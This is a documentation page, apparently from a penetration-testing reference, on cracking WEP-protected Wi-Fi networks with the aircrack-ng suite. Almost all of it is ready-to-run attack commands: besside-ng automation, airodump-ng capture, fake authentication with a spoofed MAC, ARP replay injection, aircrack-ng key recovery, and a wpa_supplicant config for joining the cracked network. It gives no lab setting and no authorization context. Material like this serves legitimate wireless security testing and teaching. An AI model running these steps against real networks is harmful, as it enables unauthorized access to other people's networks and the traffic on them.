> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# WEP

> Crack WEP-protected networks using ARP replay attacks and aircrack-ng: exploiting the fundamental weakness in WEP's IV reuse.

## Overview

WEP (Wired Equivalent Privacy) is a broken encryption protocol. Its vulnerability lies in weak initialization vectors (IVs), by collecting enough IVs through ARP replay attacks, the key can be statistically recovered.

This attack uses `aircrack-ng` suite: capture IVs with `airodump-ng`, generate traffic with `aireplay-ng`, and crack the key with `aircrack-ng`.

***

## Automatic Attack (besside-ng)

`besside-ng` automates the entire WEP cracking process, fake auth, ARP replay, and cracking in one command:

```bash theme={"dark"}
airmon-ng check kill
besside-ng -c <CHANNEL> -b <BSSID> wlan0 -v
```

***

## Manual Attack

### 1. Find the WEP Network

Scan all bands to identify WEP targets (look for `WEP` in the `ENC` column):

```bash theme={"dark"}
airodump-ng --band abg <WIFI-INTERFACE>
```

***

### 2. Focus on Target Network

Capture traffic and write to file:

```bash theme={"dark"}
airodump-ng -w wep-capture --bssid <BSSID> --channel <CHANNEL> <WIFI-INTERFACE>
```

***

### 3. Fake Authentication

Associate with the AP using a spoofed MAC to allow packet injection:

```bash theme={"dark"}
sudo aireplay-ng -1 0 -a <BSSID> -h F0:00:00:00:00:00 -e "NETWORK-NAME" <WIFI-INTERFACE>
```

***

### 4. ARP Replay Attack

Generate traffic to force the AP to produce new IVs:

```bash theme={"dark"}
sudo aireplay-ng --arpreplay -b <BSSID> -h F0:00:00:00:00:00 <WIFI-INTERFACE>
```

***

### 5. Crack the Key

Run once enough IVs are captured (typically 50,000–200,000):

```bash theme={"dark"}
sudo aircrack-ng -a 1 wep-capture-01.cap
```

***

## WEP Connection

`wpa_supplicant` config:

```
network={
    ssid="<ESSID>"
    key_mgmt=NONE
    wep_key0=<KEY>
    wep_tx_keyidx=0
}
```

Connect:

```bash theme={"dark"}
sudo airmon-ng stop wlan0mon
sudo wpa_supplicant -i wlan0 -c /tmp/client.conf
```

Get an IP address:

```bash theme={"dark"}
sudo dhclient wlan0 -v
```
